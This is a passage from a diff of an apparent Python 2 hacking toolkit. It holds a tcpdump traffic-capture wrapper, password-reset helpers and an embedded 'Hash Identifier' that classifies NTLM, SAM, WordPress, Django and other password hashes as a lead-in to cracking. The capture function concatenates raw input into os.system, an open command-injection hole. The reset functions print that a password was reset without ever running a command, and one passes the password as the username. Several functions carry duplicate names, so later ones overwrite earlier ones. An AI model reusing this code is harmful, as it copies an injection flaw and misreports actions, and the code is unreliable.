Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + 